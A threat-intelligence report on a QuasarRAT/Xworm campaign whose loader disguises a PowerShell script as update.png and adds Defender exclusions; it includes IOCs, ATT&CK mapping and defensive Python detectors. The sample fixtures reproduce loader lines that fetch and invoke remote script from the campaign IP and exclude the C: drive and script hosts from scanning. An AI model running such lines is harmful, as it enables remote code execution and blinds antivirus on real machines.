Campaign Identifier: QuasarRAT-Xworm-PowerShell-Campaign

Last Updated: October 17, 2025


BLUF (Bottom Line Up Front)

Executive Summary

Business Impact Summary

The QuasarRAT + Xworm + PowerShell campaign represents a sophisticated multi-stage attack combining commodity remote access trojans with advanced fileless execution techniques. The attack systematically disables security controls and establishes persistent remote access, creating significant data theft and system control risks.

Key Risk Factors

Risk Factor | Score | Business Impact
Security Control Disabling | 9/10 | Defender exclusions covering the entire C: drive and the script hosts leave subsequent activity unscanned
Fileless Execution | 8/10 | Memory-based execution evades traditional file-based detection methods
Remote Access Trojans | 8/10 | Full system control with data theft, surveillance, and lateral movement capabilities
Persistence Mechanisms | 7/10 | Long-term unauthorized access with two RATs deployed from the same loader

Immediate Actions

  1. ISOLATE potentially compromised systems from the network immediately
  2. RESTORE Microsoft Defender functionality and remove all attacker-added exclusions
  3. SCAN all systems for QuasarRAT and Xworm binaries
  4. AUDIT PowerShell execution logs for suspicious script blocks
  5. BLOCK access to known malicious infrastructure (dns4up.duckdns.org, 193.233.164.21)
  6. RESET all credentials for potentially compromised accounts


Overview

This campaign combines commodity RATs (QuasarRAT and Xworm) with a VBScript + PowerShell loader.
The loader disguises its payload as an image (update.png) but actually downloads a PowerShell script and executes it in memory.
That script neutralizes Microsoft Defender by adding broad path and process exclusions, then facilitates RAT deployment.


Loader Mechanism

  • VBScript stager constructs a PowerShell command string.
  • PowerShell execution uses .NET System.Net.Http.HttpClient to fetch update.png from a remote server.
  • Despite the .png extension, the file is a text‑based PowerShell script, not an image.
  • The script is read into memory, compiled into a [ScriptBlock], and executed immediately with .Invoke().
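
The .png name only fools tools that trust the extension. As an added example (not code from the original report), the following Python classifies a fetched blob by its magic bytes and by the PowerShell tokens listed in this section, so a script served as update.png is flagged on content. It also covers JPEG and GIF signatures, which goes beyond the single PNG case in the text. The two sample payloads are constructed stand-ins, not the actual update.png; the token list and the 95% printable-character threshold are assumptions.

```python
import re

# An image file must begin with one of these signatures.
IMAGE_MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}

# Tokens typical of the second stage described above (assumed list; tune to taste).
SCRIPT_TOKENS = [
    r"Add-MpPreference", r"-ExclusionPath", r"-ExclusionProcess",
    r"System\.Net\.Http\.HttpClient", r"\.GetAsync\(", r"\[ScriptBlock\]::Create\(",
    r"\.Invoke\(\)", r"Invoke-Expression", r"\bIEX\b",
]
TOKEN_RE = re.compile("|".join(SCRIPT_TOKENS), re.IGNORECASE)

# Constructed samples (not files from the campaign): a minimal genuine PNG header and
# a text stand-in that uses the same cmdlets/APIs the report lists for update.png.
REAL_PNG = IMAGE_MAGIC["png"] + b"\x00\x00\x00\x0dIHDR" + b"\x00" * 17
FAKE_PNG = (b"$c = New-Object System.Net.Http.HttpClient\r\n"
            b"Add-MpPreference -ExclusionPath 'C:\\'\r\n"
            b"Add-MpPreference -ExclusionProcess powershell.exe,wscript.exe\r\n"
            b"[ScriptBlock]::Create($body).Invoke()\r\n")


def inspect_payload(filename: str, data: bytes) -> dict:
    """Classify a downloaded blob by content rather than by the extension it claims."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    claimed_magic = IMAGE_MAGIC.get(ext)
    real_image = any(data.startswith(m) for m in IMAGE_MAGIC.values())
    try:
        text = data.decode("utf-8")
        # Share of printable characters: real images fail to decode or score low here.
        printable = sum(ch.isprintable() or ch in "\r\n\t" for ch in text) / max(len(text), 1)
    except UnicodeDecodeError:
        text, printable = "", 0.0
    tokens = sorted({m.group(0).lower() for m in TOKEN_RE.finditer(text)})
    script_like = printable > 0.95 and len(tokens) >= 2
    if claimed_magic is not None and not data.startswith(claimed_magic) and script_like:
        verdict = "mismatch"  # image extension, script body: the loader trick described above
    elif real_image:
        verdict = "image"
    elif script_like:
        verdict = "script"
    else:
        verdict = "unknown"
    return {"extension": ext, "real_image": real_image, "tokens": tokens, "verdict": verdict}


if __name__ == "__main__":
    for name, blob in (("update.png", FAKE_PNG), ("update.png", REAL_PNG)):
        print(name, inspect_payload(name, blob)["verdict"])
```

The same check belongs at a web proxy or sandbox: decide on magic bytes and body, never on the Content-Type header or the URL's extension.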

Defense Evasion

The PowerShell payload neutralizes Microsoft Defender by adding exclusions for:

  • The entire C:\ drive (ExclusionPath).
  • Processes: powershell.exe, wscript.exe, cmd.exe, cvtres.exe (ExclusionProcess).

A path exclusion stops Defender scanning anything under that path; a process exclusion stops it scanning files those processes open, so scripts loaded by the excluded hosts go unchecked. Together these blind Defender to subsequent malicious activity on the host.
Two caveats for responders: Add-MpPreference requires local administrator rights, so the loader was already running elevated when this step succeeded; and every preference change is logged as Event ID 5007 in the Microsoft-Windows-Windows Defender/Operational log, while the exclusions currently in force can be listed with Get-MpPreference.
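
Restoring Defender means finding every exclusion the loader added, not just the ones named above. As an added example (not code from the original report), the following Python audits the JSON that Get-MpPreference emits when piped through Select-Object and ConvertTo-Json, ranks the dangerous entries, and renders the Remove-MpPreference calls that undo them. The input is a constructed sample, and the list of script hosts and risky extensions is an assumed baseline rather than anything the report enumerates.

```python
import json
import re

# Constructed sample in the shape produced by
#   Get-MpPreference | Select-Object ExclusionPath, ExclusionProcess, ExclusionExtension | ConvertTo-Json
# on a host after the loader ran. Values are illustrative, not a real capture.
SAMPLE_MPPREF = json.dumps({
    "ExclusionPath": ["C:\\", "C:\\Program Files\\Vendor\\agent.exe"],
    "ExclusionProcess": ["powershell.exe", "wscript.exe", "cmd.exe", "cvtres.exe", "sqlservr.exe"],
    "ExclusionExtension": None,
})

# Script hosts, compilers and proxy-execution binaries (assumed baseline): a process
# exclusion for any of these means files they open skip real-time scanning.
SCRIPT_HOSTS = {
    "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "cmd.exe", "mshta.exe",
    "cvtres.exe", "csc.exe", "msbuild.exe", "rundll32.exe", "regsvr32.exe",
}
DRIVE_ROOT = re.compile(r"^[A-Za-z]:\\?$")
BROAD_DIR = re.compile(r"^[A-Za-z]:\\(Windows|Users|ProgramData|Temp)\\?$", re.IGNORECASE)
RISKY_EXT = {"ps1", "vbs", "js", "exe", "dll", "bat", "cmd"}


def audit_exclusions(mppref_json: str) -> list:
    """Return the exclusions that would let the second stage and the RATs run unscanned."""
    prefs = json.loads(mppref_json)
    findings = []
    for path in prefs.get("ExclusionPath") or []:
        if DRIVE_ROOT.match(path):
            findings.append({"kind": "ExclusionPath", "value": path, "severity": "critical",
                             "reason": "entire drive excluded"})
        elif BROAD_DIR.match(path):
            findings.append({"kind": "ExclusionPath", "value": path, "severity": "high",
                             "reason": "broad system directory excluded"})
    for proc in prefs.get("ExclusionProcess") or []:
        # Entries may be bare names or full paths; compare on the file name only.
        if proc.rsplit("\\", 1)[-1].lower() in SCRIPT_HOSTS:
            findings.append({"kind": "ExclusionProcess", "value": proc, "severity": "critical",
                             "reason": "script host or compiler excluded"})
    for ext in prefs.get("ExclusionExtension") or []:
        if ext.lstrip(".").lower() in RISKY_EXT:
            findings.append({"kind": "ExclusionExtension", "value": ext, "severity": "high",
                             "reason": "executable/script extension excluded"})
    return findings


def remediation_commands(findings: list) -> list:
    """Render the Remove-MpPreference calls that undo each finding (run from an elevated shell)."""
    cmds = []
    for f in findings:
        value = f["value"].replace("'", "''")  # PowerShell single-quoted string escaping
        cmds.append(f"Remove-MpPreference -{f['kind']} '{value}'")
    return cmds


if __name__ == "__main__":
    for cmd in remediation_commands(audit_exclusions(SAMPLE_MPPREF)):
        print(cmd)
```

Legitimate exclusions (the vendor agent and sqlservr.exe in the sample) pass through untouched; review those against change records separately rather than wiping the whole list blind.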


RAT Deployment

Once exclusions are in place, the loader hands off to RAT binaries:

  • QuasarRAT: .NET‑based remote access trojan, ~2–3 MB, often with configs embedded in resources.
  • Xworm: smaller (~70 KB), obfuscated strings, commodity RAT functionality.

Both provide persistence, remote control, and data theft capabilities.

Technical Analysis

Infrastructure Overview

Infrastructure Component | Value | Role in Attack Chain
Dynamic DNS Domain | dns4up.duckdns[.]org | Primary C2 domain for RAT communication
Hosting IP | 193.233.164.21 | Infrastructure hosting malicious payloads
Payload Disguise | update.png | PowerShell script disguised as an image file

Attack Chain Components

Component | Technology | Purpose
Initial Loader | VBScript | Constructs the PowerShell execution command
Delivery Mechanism | PowerShell + .NET HttpClient | Downloads and executes the second-stage script in memory
Defense Evasion | Add-MpPreference exclusions | Removes the C: drive and the script hosts from Defender scanning
Primary RAT | QuasarRAT (.NET) | Full-featured remote access trojan (~2–3 MB)
Secondary RAT | Xworm | Lightweight commodity RAT (~70 KB)

Tactics, Techniques, and Procedures (TTPs)

  • Fileless execution: PowerShell loads and executes script content directly in memory.
  • Defense evasion: Microsoft Defender exclusions.
  • Remote access: RAT deployment for persistence and control.
  • Living off the land: Abuse of legitimate scripting engines (VBScript, PowerShell).

Pivoting Strategy

Analysts can pivot on:

  • File names: update.png, update.ps1.
  • Strings: Add-MpPreference, ExclusionPath, HttpClient.GetAsync.
  • Domains/IPs: DuckDNS subdomains, 193.233.164.21.
  • Malware traits: QuasarRAT’s embedded configs, Xworm’s obfuscation patterns.

Final Summary

This campaign demonstrates a layered loader strategy:

  1. VBScript launches PowerShell.
  2. PowerShell fetches a disguised payload (update.png).
  3. Payload disables Defender and executes in memory.
  4. RATs (QuasarRAT, Xworm) are deployed for persistence and remote control.

Key insight: the .png extension is a deliberate misdirection — the payload is a PowerShell script, not an image.
This is a classic “living off the land” technique, leveraging native scripting tools for stealth and evasion.


Attack Tactics & Procedures

MITRE ATT&CK Mapping

Tactic | Technique ID | Technique Name | Implementation
Execution | T1059.005 | Command and Scripting Interpreter: Visual Basic | VBScript stager builds and launches the PowerShell command
Execution | T1059.001 | Command and Scripting Interpreter: PowerShell | Fileless PowerShell script execution in memory
Command and Control | T1105 | Ingress Tool Transfer | HttpClient download of update.png from 193.233.164.21
Defense Evasion | T1036.008 | Masquerading: Masquerade File Type | PowerShell script served with a .png extension
Defense Evasion | T1562.001 | Impair Defenses: Disable or Modify Tools | Microsoft Defender exclusions via Add-MpPreference
Defense Evasion | T1027 | Obfuscated Files or Information | Xworm's obfuscated strings
Persistence | not established in this analysis | RAT-provided persistence | QuasarRAT and Xworm maintain long-term access; the specific mechanism is not observed in the loader chain described here
Command and Control | T1071.001 | Application Layer Protocol: Web Protocols | HTTP/HTTPS communication with C2 infrastructure

Threat Hunting Indicators

Indicator Type | Value | Hunting Method
File Names | update.png, update.ps1 | File system monitoring, EDR alerts
PowerShell Strings | Add-MpPreference, ExclusionPath, HttpClient.GetAsync | PowerShell logging, script block analysis
Network Indicators | dns4up.duckdns.org, 193.233.164.21 | DNS monitoring, network traffic analysis
Malware Signatures | QuasarRAT configs, Xworm obfuscation | Memory analysis, YARA rules
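
The strings in the Pivoting Strategy section and in the table above only become a detection once they are scored together, because the fetch, the in-memory invoke and the exclusion calls usually land in separate Event ID 4104 script blocks. As an added example (not code from the original report), the following Python scores each script block against those strings and aggregates per host, so a machine that shows the whole chain surfaces while an administrator adding one narrow exclusion does not. The events are constructed stand-ins; the rule weights and the alert threshold are assumptions to tune against your own baseline.

```python
import re

# Constructed Event ID 4104 (Microsoft-Windows-PowerShell/Operational) records.
# Illustrative stand-ins, not the campaign's actual script blocks.
SAMPLE_EVENTS = [
    {"EventID": 4104, "Computer": "WS01", "ScriptBlockId": "a1", "ScriptBlockText":
     "$h = New-Object System.Net.Http.HttpClient; "
     "$r = $h.GetAsync('http://193.233.164.21/update.png').Result; "
     "$s = $r.Content.ReadAsStringAsync().Result; "
     "[ScriptBlock]::Create($s).Invoke()"},
    {"EventID": 4104, "Computer": "WS01", "ScriptBlockId": "a2", "ScriptBlockText":
     "Add-MpPreference -ExclusionPath 'C:\\'; "
     "Add-MpPreference -ExclusionProcess powershell.exe, wscript.exe, cmd.exe, cvtres.exe"},
    {"EventID": 4104, "Computer": "WS02", "ScriptBlockId": "b1", "ScriptBlockText":
     "Add-MpPreference -ExclusionPath 'D:\\SQLBackups' # backup agent install"},
    {"EventID": 4104, "Computer": "WS03", "ScriptBlockId": "c1", "ScriptBlockText":
     "Get-ChildItem C:\\Temp | Remove-Item"},
]

# (name, weight, pattern). Weights are assumed and reflect how specific each
# behaviour is to this loader chain; a drive-root exclusion is rarely benign.
RULES = [
    ("httpclient_fetch", 2, re.compile(r"System\.Net\.Http\.HttpClient|\.GetAsync\(", re.I)),
    ("image_ext_payload", 2, re.compile(r"https?://[^\s'\"]+\.(png|jpg|gif)\b", re.I)),
    ("in_memory_invoke", 3, re.compile(r"\[ScriptBlock\]::Create\(|Invoke-Expression|\bIEX\b", re.I)),
    ("drive_root_exclusion", 4,
     re.compile(r"Add-MpPreference\s+-ExclusionPath\s+['\"]?[A-Z]:\\{0,2}['\"]?(\s|;|,|$)", re.I)),
    ("script_host_exclusion", 3,
     re.compile(r"Add-MpPreference\s+-ExclusionProcess\s+[^;\n]*\b(powershell|wscript|cscript|cmd|cvtres|mshta)\.exe", re.I)),
    ("known_infra", 3, re.compile(r"193\.233\.164\.21|duckdns\.org", re.I)),
]


def score_block(text: str):
    """Score one script block; returns (score, [rule names that fired])."""
    hits = [name for name, _, pat in RULES if pat.search(text)]
    score = sum(w for name, w, _ in RULES if name in hits)
    return score, hits


def hunt(events, threshold: int = 5) -> dict:
    """Sum scores per host over all 4104 records and return hosts at or above threshold."""
    per_host = {}
    for ev in events:
        if ev.get("EventID") != 4104:
            continue
        s, hits = score_block(ev["ScriptBlockText"])
        h = per_host.setdefault(ev["Computer"], {"score": 0, "hits": set(), "blocks": []})
        h["score"] += s
        h["hits"].update(hits)
        if s:
            h["blocks"].append(ev["ScriptBlockId"])
    return {host: h for host, h in per_host.items() if h["score"] >= threshold}


if __name__ == "__main__":
    for host, h in hunt(SAMPLE_EVENTS).items():
        print(host, h["score"], sorted(h["hits"]), h["blocks"])
```

Feed it the output of Get-WinEvent over the PowerShell Operational log (or the equivalent SIEM export); the drive-root rule alone is worth a standalone alert, and the per-host sum is what separates the full chain from ordinary administration.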

Incident Response Procedures

Priority 1: Initial Response

  1. ISOLATE potentially compromised systems from network
  2. RESTORE Microsoft Defender functionality and remove all exclusions
  3. SCAN all systems for QuasarRAT and Xworm binaries
  4. AUDIT PowerShell execution logs for suspicious script blocks
  5. BLOCK access to known malicious infrastructure (dns4up.duckdns.org, 193.233.164.21)
  6. RESET all credentials for potentially compromised accounts

Priority 2: Investigation & Analysis

  1. FORENSIC ANALYSIS of PowerShell logs for script block execution
  2. MEMORY ANALYSIS for fileless execution artifacts
  3. NETWORK ANALYSIS for connections to C2 infrastructure
  4. MALWARE ANALYSIS of recovered RAT binaries
  5. THREAT HUNTING for additional compromised systems and lateral movement

Priority 3: Remediation & Recovery

  1. REBUILD compromised systems from known-good images
  2. RESET all credentials for potentially compromised accounts
  3. IMPLEMENT PowerShell logging and monitoring
  4. DEPLOY application whitelisting for script execution
  5. ESTABLISH enhanced endpoint detection and response capabilities

Operational Impact Assessment

Impact Scenarios

Impact Category | Severity Level | Recovery Time
Data Compromise | HIGH | extended period
System Compromise | HIGH | several weeks
Operational Disruption | MEDIUM | several weeks
Security Control Recovery | HIGH | several weeks
Long-term Monitoring | MEDIUM | extended period
Compliance Impact | HIGH | extended period

Operational Impact Timeline

  • Immediate Response: System isolation, security control restoration, emergency response
  • Investigation Phase: System rebuilding, enhanced monitoring deployment, credential rotation
  • Recovery Phase: Process improvements, security hardening, user training
  • Long-term Phase: Security architecture review, compliance activities
  • Extended Phase: Ongoing monitoring and regulatory compliance


Long-term Defensive Strategy

Technology Enhancements

  1. Endpoint Detection & Response (EDR) with fileless execution capabilities and behavioral analysis
  2. Application Control to prevent unauthorized script execution and unknown software deployment
  3. PowerShell Constrained Language Mode enforced through application control (WDAC or AppLocker) together with script block logging; note that ExecutionPolicy is not a security boundary and is bypassed trivially (-ExecutionPolicy Bypass), so it must not be relied on as a control
  4. Advanced Threat Protection with real-time fileless attack detection and memory forensics
  5. Network Traffic Analysis for C2 communication detection and anomaly identification
  6. Security Information and Event Management (SIEM) with PowerShell integration and correlation rules
  7. Cloud Access Security Broker (CASB) for monitoring cloud-based exfiltration attempts

Process Improvements

  1. PowerShell Logging with script block logging, module logging, and transcription capabilities
  2. Application Whitelisting for script execution, file downloads, and PowerShell commands
  3. Regular Security Assessments including penetration testing of endpoint defenses and fileless attack simulations
  4. Incident Response Playbooks specific to fileless malware attacks and RAT remediation
  5. Change Management procedures with security approval requirements and rollback capabilities
  6. Threat Hunting Program with regular hunts for fileless attack indicators and RAT infrastructure

Organizational Measures

  1. Security Awareness Training on social engineering, malicious scripts, and RAT detection
  2. Regular Security Assessments including red team exercises and fileless attack scenarios
  3. Threat Intelligence Subscription for emerging fileless malware threats and RAT infrastructure monitoring
  4. Executive Security Briefings on living-off-the-land attack techniques and business impact
  5. Investment in Security Tools and personnel training for advanced threat detection and response
  6. Security Champions Program to promote security culture and incident reporting

Resource Investment Summary

  • Technology Investment: EDR and advanced protection deployment across endpoints
  • Training Investment: Security awareness and specialized training for personnel
  • Process Investment: Security program development and maintenance activities
  • Total Investment: Comprehensive fileless attack protection capabilities
  • Expected Outcome: Prevention of fileless attack incidents and improved detection capabilities

Frequently Asked Questions

Technical Questions

Q: Why is fileless execution particularly dangerous?
A: It evades traditional file-based detection methods, leaves minimal forensic artifacts, and can bypass many security controls that rely on file scanning.

Q: How does the Defender exclusion mechanism work?
A: The script uses Add-MpPreference to add an ExclusionPath for the entire C: drive and ExclusionProcess entries for the script hosts, so Defender stops scanning anything on that drive and any file those processes open. Both changes require administrator rights and are recorded as Event ID 5007 in the Defender Operational log.

Q: What makes the .png disguise effective?
A: Many security tools and network monitoring systems inspect files with image extensions less closely than executables or scripts, so the PowerShell text passes initial filters. Checks that look at magic bytes and body content rather than the extension or Content-Type header defeat the disguise.

Business Questions

Q: What are the regulatory implications of security control disabling?
A: Significant - disabling security controls can be considered willful negligence and may impact compliance with various security frameworks and regulations.

Q: Should we rebuild or patch compromised systems?
A: REBUILD is strongly recommended due to the sophistication of fileless attacks and the potential for additional hidden compromise mechanisms.

Q: How can we prevent similar fileless attacks?
A: Implement PowerShell logging, application control, endpoint detection with fileless execution capabilities, and user education on malicious scripts.



License

© 2025 Joseph. All rights reserved.
Free to read, but reuse requires written permission.